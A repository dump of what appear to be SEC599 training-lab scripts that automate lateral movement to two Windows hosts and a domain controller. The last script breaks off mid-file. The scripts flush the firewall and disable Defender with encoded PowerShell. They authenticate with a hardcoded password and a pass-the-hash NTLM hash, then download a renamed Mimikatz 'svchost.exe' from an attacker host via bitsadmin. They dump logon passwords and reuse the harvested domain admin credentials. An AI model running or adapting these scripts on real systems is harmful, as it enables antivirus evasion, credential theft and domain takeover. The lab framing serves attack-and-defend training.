├── 4-movetowin01-FINAL.sh
├── 4-movetowin01-INITIAL.sh
├── 5-movetowin02-FINAL.sh
├── 5-movetowin02-INITIAL.sh
├── 6-movetodc-FINAL.sh
├── 6-movetodc-INITIAL.sh
├── README.md
├── cuckoo-install.sh
├── dc-execute.cmd
├── kali-DTF-execute.sh
├── kali-execute.sh
├── ubuntu01-execute.sh
├── ubuntu02-execute.sh
├── ubuntu03-execute.sh
├── windows01-execute.cmd
└── windows02-execute.cmd


/4-movetowin01-FINAL.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # SEC599 - DtF Script - Step 4 - Move laterally to Windows01
 3 | 
 4 | echo "Clearing firewall rules (allow all inbound)"
 5 | echo "-------------------------------------------"
 6 | iptables -F && echo "OK - iptables flushed"
 7 | iptables -I INPUT -j ACCEPT && echo "OK - all inbound allowed"
 8 | echo "Done"
 9 | 
10 | while read c; do
11 |   ip=$(grep "^$c" /root/Desktop/CTF/output/3-metsessions_cms_backdoor_ip-final | awk -F ' ' '{print $2}')
12 |   echo ""
13 |   echo "Setting up portforward to Session $c - IP address $ip"
14 |   echo "-----------------------------------------------------"
15 |   cp /root/Desktop/CTF/4-portforwardtemplate /root/Desktop/CTF/4-portforward.rc
16 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/4-portforward.rc
17 |   echo "resource /root/Desktop/CTF/4-portforward.rc" | nc 127.0.0.1 55554
18 | 
19 |   echo "Use Dwight Schrute's credentials against Windows01 - Session $c - IP address $ip"
20 |   echo "--------------------------------------------------------------------------------"
21 | 
22 |   # Disable Defender
23 |   /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
24 | 
25 |   # sleep 5
26 |   /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\dwight.schrute\\Downloads\\svhost.exe'
27 |   /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAZAB3AGkAZwBoAHQALgBzAGMAaAByAHUAdABlAFwAXABEAG8AdwBuAGwAbwBhAGQAcwBcAFwAcwB2AGgAbwBzAHQALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
28 | 
29 |   # Enable Defender
30 |   /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
31 | 
32 |   echo "Done"
33 | 
34 |   echo "Removing portforward to Session $c - IP address $ip"
35 |   echo "---------------------------------------------------"
36 |   cp /root/Desktop/CTF/4-stopportforwardtemplate /root/Desktop/CTF/4-stopportforward.rc
37 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/4-stopportforward.rc
38 |   echo "resource /root/Desktop/CTF/4-stopportforward.rc" | nc 127.0.0.1 55554
39 | 
40 | done </root/Desktop/CTF/output/3-cms_backdoor_sessions_final
41 | 


--------------------------------------------------------------------------------
/4-movetowin01-INITIAL.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # SEC599 - DtF Script - Step 4 - Move laterally to Windows01
 3 | 
 4 | echo "Clearing firewall rules (allow all inbound)"
 5 | echo "-------------------------------------------"
 6 | iptables -F && echo "OK - iptables flushed"
 7 | iptables -I INPUT -j ACCEPT && echo "OK - all inbound allowed"
 8 | echo "Done"
 9 | 
10 | while read c; do
11 |   ip=$(grep "^$c" /root/Desktop/CTF/output/3-metsessions_ip-initial | awk -F ' ' '{print $2}')
12 |   echo ""
13 |   echo "Setting up portforward to Session $c - IP address $ip"
14 |   echo "-----------------------------------------------------"
15 |   cp /root/Desktop/CTF/4-portforwardtemplate /root/Desktop/CTF/4-portforward.rc
16 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/4-portforward.rc
17 |   echo "resource /root/Desktop/CTF/4-portforward.rc" | nc 127.0.0.1 55554
18 | 
19 |   echo "Use Dwight Schrute's credentials against Windows01 - Session $c - IP address $ip"
20 |   echo "--------------------------------------------------------------------------------"
21 |   # Disable Defender
22 |   /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
23 |   # sleep 5
24 |   /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\dwight.schrute\\Downloads\\svhost.exe'
25 |   /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAZAB3AGkAZwBoAHQALgBzAGMAaAByAHUAdABlAFwAXABEAG8AdwBuAGwAbwBhAGQAcwBcAFwAcwB2AGgAbwBzAHQALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
26 | 
27 |   # Enable Defender
28 |   /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u dwight.schrute -p BattleSt4r -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
29 |   echo "Done"
30 | 
31 |   echo "Removing portforward to Session $c - IP address $ip"
32 |   echo "---------------------------------------------------"
33 |   cp /root/Desktop/CTF/4-stopportforwardtemplate /root/Desktop/CTF/4-stopportforward.rc
34 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/4-stopportforward.rc
35 |   echo "resource /root/Desktop/CTF/4-stopportforward.rc" | nc 127.0.0.1 55554
36 | 
37 | done </root/Desktop/CTF/output/2-cms_sessions-initial
38 | 


--------------------------------------------------------------------------------
/5-movetowin02-FINAL.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # SEC599 - DtF Script - Step 5 - Move laterally to Windows02
 3 | 
 4 | echo "Clearing firewall rules (allow all inbound)"
 5 | echo "-------------------------------------------"
 6 | iptables -F && echo "OK - iptables flushed"
 7 | iptables -I INPUT -j ACCEPT && echo "OK - all inbound allowed"
 8 | echo "Done"
 9 | 
10 | while read c; do
11 |   ip=$(grep "^$c" /root/Desktop/CTF/output/3-metsessions_cms_backdoor_ip-final | awk -F ' ' '{print $2}')
12 |   echo ""
13 |   echo "Setting up portforward to Session $c - IP address $ip"
14 |   echo "-----------------------------------------------------"
15 |   cp /root/Desktop/CTF/5-portforwardtemplate /root/Desktop/CTF/5-portforward.rc
16 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/5-portforward.rc
17 |   echo "resource /root/Desktop/CTF/5-portforward.rc" | nc 127.0.0.1 55554
18 | 
19 |   echo "Use local Administrator account against WINDOWS02 - Session $c - IP address $ip"
20 |   echo "-------------------------------------------------------------------------------"
21 | 
22 |   # Disable Defender
23 |   /usr/bin/crackmapexec 127.0.0.1 -d WINDOWS02 -u Administrator -H 4a09d7837df560300323d1ead87fa2eb -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
24 | 
25 |   # sleep 5
26 |   /usr/bin/crackmapexec 127.0.0.1 -d WINDOWS02 -u Administrator -H 4a09d7837df560300323d1ead87fa2eb -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\alan.marshall\\Downloads\\svhost.exe'
27 |   /usr/bin/crackmapexec 127.0.0.1 -d WINDOWS02 -u Administrator -H 4a09d7837df560300323d1ead87fa2eb -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAYQBsAGEAbgAuAG0AYQByAHMAaABhAGwAbABcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHMAdgBoAG8AcwB0AC4AZQB4AGUAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBQAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQA'
28 | 
29 |   # Enable Defender
30 |   /usr/bin/crackmapexec 127.0.0.1 -d WINDOWS02 -u Administrator -H 4a09d7837df560300323d1ead87fa2eb -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
31 | 
32 |   echo "Done"
33 | 
34 |   echo "Removing portforward to session $c - IP address $ip"
35 |   echo "---------------------------------------------------"
36 |   cp /root/Desktop/CTF/5-stopportforwardtemplate /root/Desktop/CTF/5-stopportforward.rc
37 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/5-stopportforward.rc
38 |   echo "resource /root/Desktop/CTF/5-stopportforward.rc" | nc 127.0.0.1 55554
39 | 
40 | done </root/Desktop/CTF/output/3-cms_backdoor_sessions_final
41 | 


--------------------------------------------------------------------------------
/5-movetowin02-INITIAL.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # SEC599 - DtF Script - Step 5 - Move laterally to Windows02
 3 | 
 4 | echo "Clearing firewall rules (allow all inbound)"
 5 | echo "-------------------------------------------"
 6 | iptables -F && echo "OK - iptables flushed"
 7 | iptables -I INPUT -j ACCEPT && echo "OK - all inbound allowed"
 8 | echo "Done"
 9 | 
10 | while read c; do
11 |   ip=$(grep "^$c" /root/Desktop/CTF/output/3-metsessions_ip-initial | awk -F ' ' '{print $2}')
12 |   echo ""
13 |   echo "Setting up portforward to Session $c - IP address $ip"
14 |   echo "-----------------------------------------------------"
15 |   cp /root/Desktop/CTF/5-portforwardtemplate /root/Desktop/CTF/5-portforward.rc
16 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/5-portforward.rc
17 |   echo "resource /root/Desktop/CTF/5-portforward.rc" | nc 127.0.0.1 55554
18 | 
19 |   echo "Use local Administrator account against WINDOWS02 - Session $c - IP address $ip"
20 |   echo "-------------------------------------------------------------------------------"
21 | 
22 |   # Disable Defender
23 |   /usr/bin/crackmapexec 127.0.0.1 -d WINDOWS02 -u Administrator -H 4a09d7837df560300323d1ead87fa2eb -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
24 | 
25 |   # sleep 5
26 |   /usr/bin/crackmapexec 127.0.0.1 -d WINDOWS02 -u Administrator -H 4a09d7837df560300323d1ead87fa2eb -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\alan.marshall\\Downloads\\svhost.exe'
27 |   /usr/bin/crackmapexec 127.0.0.1 -d WINDOWS02 -u Administrator -H 4a09d7837df560300323d1ead87fa2eb -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAYQBsAGEAbgAuAG0AYQByAHMAaABhAGwAbABcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHMAdgBoAG8AcwB0AC4AZQB4AGUAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBQAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQA'
28 | 
29 |   # Enable Defender
30 |   /usr/bin/crackmapexec 127.0.0.1 -d WINDOWS02 -u Administrator -H 4a09d7837df560300323d1ead87fa2eb -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
31 | 
32 |   echo "Done"
33 | 
34 |   echo "Removing portforward to session $c - IP address $ip"
35 |   echo "---------------------------------------------------"
36 |   cp /root/Desktop/CTF/5-stopportforwardtemplate /root/Desktop/CTF/5-stopportforward.rc
37 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/5-stopportforward.rc
38 |   echo "resource /root/Desktop/CTF/5-stopportforward.rc" | nc 127.0.0.1 55554
39 | 
40 | done </root/Desktop/CTF/output/2-cms_sessions-initial
41 | 


--------------------------------------------------------------------------------
/6-movetodc-FINAL.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # SEC599 - DtF Script - Step 6 - Move laterally to DC
 3 | 
 4 | echo "Clearing firewall rules (allow all inbound)"
 5 | echo "-------------------------------------------"
 6 | iptables -F && echo "OK - iptables flushed"
 7 | iptables -I INPUT -j ACCEPT && echo "OK - all inbound allowed"
 8 | echo "Done"
 9 | 
10 | echo "Searching for domain admin passwords or hashes"
11 | echo "----------------------------------------------"
12 | 
13 | while read c; do
14 |   ip=$(grep "^$c" /root/Desktop/CTF/output/3-metsessions_cms_backdoor_ip-final | awk -F ' ' '{print $2}')
15 | 
16 |   # Making sure Mimikatz output file is clean
17 |   rm -rf /root/Desktop/CTF/output/6-temp_mimikatz_output-final
18 | 
19 |   awk "/Session $c - IP address $ip/,/Removing portforward to Session $c/" /root/Desktop/CTF/results/*finalattack.result > /root/Desktop/CTF/output/6-temp_mimikatz_output-final
20 | 
21 |   administratorpwd=""
22 |   administratorhash=""
23 |   alanmarshalldadmpwd=""
24 |   alanmarshalldadmhash=""
25 | 
26 |   administratorpwd=$(grep -v "null" /root/Desktop/CTF/output/6-temp_mimikatz_output-final | grep -v "WINDOWS02" | grep -v "WINDOWS01" | grep -i -A2 "Username : Administrator" | grep -m1  "Password" | awk -F ':' '{print $3}' | xargs | strings)
27 |   administratorhash=$(grep -v "null" /root/Desktop/CTF/output/6-temp_mimikatz_output-final | grep -v "WINDOWS02" | grep -v "WINDOWS01" | grep -i -A2 "Username : Administrator" | grep -m1 "NTLM" | awk -F ':' '{print $3}' | xargs | strings)
28 |   alanmarshalldadmpwd=$(grep -v "null" /root/Desktop/CTF/output/6-temp_mimikatz_output-final | grep -i -A2 "Username : alan.marshall.dadm" | grep -m1 "Password" | awk -F ':' '{print $3}' | xargs | strings)
29 |   alanmarshalldadmhash=$(grep -v "null" /root/Desktop/CTF/output/6-temp_mimikatz_output-final | grep -i -A2 "Username : alan.marshall.dadm" | grep -m1 "NTLM" | awk -F ':' '{print $3}' | xargs | strings)
30 | 
31 |   echo "Setting up portforward to session $c - IP address $ip"
32 |   echo "-----------------------------------------------------"
33 |   cp /root/Desktop/CTF/6-portforwardtemplate /root/Desktop/CTF/6-portforward.rc
34 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/6-portforward.rc
35 |   echo "resource /root/Desktop/CTF/6-portforward.rc" | nc 127.0.0.1 55554
36 | 
37 | if [ "$administratorpwd" != "" ]
38 | then
39 |    echo ""
40 |    echo "Use identified domain admin 'Administrator' account against DC on $ip (using password '$administratorpwd')"
41 |    echo "----------------------------------------------------------------------------------------------------------"
42 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorpwd -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
43 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorpwd -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\Administrator\\Downloads\\pingcastle.exe'
44 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorpwd -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHAAaQBuAGcAYwBhAHMAdABsAGUALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
45 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorpwd -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
46 | 
47 | elif [ "$administratorhash" != "" ]
48 | then 
49 |    echo ""
50 |    echo "Use identified domain admin 'Administrator' account against DC on $ip (using hash '$administratorhash')"
51 |    echo "-------------------------------------------------------------------------------------------------------"
52 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorhash -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
53 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -H $administratorhash -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\Administrator\\Downloads\\pingcastle.exe'
54 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -H $administratorhash -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHAAaQBuAGcAYwBhAHMAdABsAGUALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
55 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorhash -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
56 | 
57 | elif [ "$alanmarshalldadmpwd" != "" ]
58 | then 
59 |    echo ""
60 |    echo "Use identified domain admin 'alan.marshall.dadm' account against DC on $ip (using password '$alanmarshalldadmpwd')"
61 |    echo "------------------------------------------------------------------------------------------------------------------"
62 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmpwd -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
63 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmpwd -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\Administrator\\Downloads\\pingcastle.exe'
64 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmpwd -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHAAaQBuAGcAYwBhAHMAdABsAGUALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
65 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmpwd -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
66 | 
67 | elif [ "$alanmarshalldadmhash" != "" ]
68 | then 
69 |    echo ""
70 |    echo "Use identified domain admin 'alan.marshall.dadm' account against DC on $ip (using hash '$alanmarshalldadmhash')"
71 |    echo "---------------------------------------------------------------------------------------------------------------"
72 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -p $alanmarshalldadmhash -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
73 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -H $alanmarshalldadmhash -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\Administrator\\Downloads\\pingcastle.exe'
74 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -H $alanmarshalldadmhash -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHAAaQBuAGcAYwBhAHMAdABsAGUALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
75 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u alan.marshall.dadm -H $alanmarshalldadmhash -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
76 | else
77 |    echo ""
78 |    echo "No domain admin credentials found..."
79 | fi
80 | 
81 |   echo "Removing portforward to session $c - IP address $ip"
82 |   echo "---------------------------------------------------"
83 |   cp /root/Desktop/CTF/6-stopportforwardtemplate /root/Desktop/CTF/6-stopportforward.rc
84 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/6-stopportforward.rc
85 |   echo "resource /root/Desktop/CTF/6-stopportforward.rc" | nc 127.0.0.1 55554
86 | done </root/Desktop/CTF/output/3-cms_backdoor_sessions_final
87 | 


--------------------------------------------------------------------------------
/6-movetodc-INITIAL.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # SEC599 - DtF Script - Step 6 - Move laterally to DC
 3 | 
 4 | echo "Clearing firewall rules (allow all inbound)"
 5 | echo "-------------------------------------------"
 6 | iptables -F && echo "OK - iptables flushed"
 7 | iptables -I INPUT -j ACCEPT && echo "OK - all inbound allowed"
 8 | echo "Done"
 9 | 
10 | echo "Searching for domain admin passwords or hashes"
11 | echo "----------------------------------------------"
12 | 
13 | while read c; do
14 |   ip=$(grep "^$c" /root/Desktop/CTF/output/3-metsessions_ip-initial | awk -F ' ' '{print $2}')
15 |   
16 |   # Making sure Mimikatz output file is clean
17 |   rm -rf /root/Desktop/CTF/output/6-temp_mimikatz_output-initial
18 | 
19 |   awk "/Session $c - IP address $ip/,/Removing portforward to Session $c/" /root/Desktop/CTF/results/*initialattack.result > /root/Desktop/CTF/output/6-temp_mimikatz_output-initial
20 | 
21 |   administratorpwd=""
22 |   administratorhash=""
23 |   alanmarshalldadmpwd=""
24 |   alanmarshalldadmhash=""
25 | 
26 |   administratorpwd=$(grep -v "null" /root/Desktop/CTF/output/6-temp_mimikatz_output-initial | grep -v "WINDOWS02" | grep -v "WINDOWS01" | grep -i -A2 "Username : Administrator" | grep -m1  "Password" | awk -F ':' '{print $3}' | xargs | strings)
27 |   administratorhash=$(grep -v "null" /root/Desktop/CTF/output/6-temp_mimikatz_output-initial | grep -v "WINDOWS02" | grep -v "WINDOWS01" | grep -i -A2 "Username : Administrator" | grep -m1 "NTLM" | awk -F ':' '{print $3}' | xargs | strings)
28 |   alanmarshalldadmpwd=$(grep -v "null" /root/Desktop/CTF/output/6-temp_mimikatz_output-initial | grep -i -A2 "Username : alan.marshall.dadm" | grep -m1 "Password" | awk -F ':' '{print $3}' | xargs | strings)
29 |   alanmarshalldadmhash=$(grep -v "null" /root/Desktop/CTF/output/6-temp_mimikatz_output-initial | grep -i -A2 "Username : alan.marshall.dadm" | grep -m1 "NTLM" | awk -F ':' '{print $3}' | xargs | strings)
30 | 
31 |   echo "Setting up portforward to session $c - IP address $ip"
32 |   echo "-----------------------------------------------------"
33 |   cp /root/Desktop/CTF/6-portforwardtemplate /root/Desktop/CTF/6-portforward.rc
34 |   sed -i "s/TEMPLATE/$c/g" /root/Desktop/CTF/6-portforward.rc
35 |   echo "resource /root/Desktop/CTF/6-portforward.rc" | nc 127.0.0.1 55554
36 | 
37 | if [ "$administratorpwd" != "" ]
38 | then
39 |    echo ""
40 |    echo "Use identified domain admin 'Administrator' account against DC on $ip (using password '$administratorpwd')"
41 |    echo "----------------------------------------------------------------------------------------------------------"
42 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorpwd -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
43 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorpwd -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\Administrator\\Downloads\\pingcastle.exe'
44 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorpwd -x 'powershell.exe -Enc YwBtAGQAIAAvAGMAIABDADoAXABcAFUAcwBlAHIAcwBcAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAFwARABvAHcAbgBsAG8AYQBkAHMAXABcAHAAaQBuAGcAYwBhAHMAdABsAGUALgBlAHgAZQAgAHMAZQBrAHUAcgBsAHMAYQA6ADoAbABvAGcAbwBuAFAAYQBzAHMAdwBvAHIAZABzACAAZQB4AGkAdAA='
45 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorpwd -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAZgBhAGwAcwBlAA=='
46 | 
47 | elif [ "$administratorhash" != "" ]
48 | then 
49 |    echo ""
50 |    echo "Use identified domain admin 'Administrator' account against DC on $ip (using hash '$administratorhash')"
51 |    echo "-------------------------------------------------------------------------------------------------------"
52 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -p $administratorhash -x 'powershell.exe -Enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQA='
53 |    /usr/bin/crackmapexec 127.0.0.1 -d SYNCTECHLABS -u Administrator -H $administratorhash -x 'bitsadmin /transfer debjob /download /priority normal http://192.168.1.212:8080/svchost.exe C:\\Users\\Administrator\\Downloads\\pingcastle.exe'
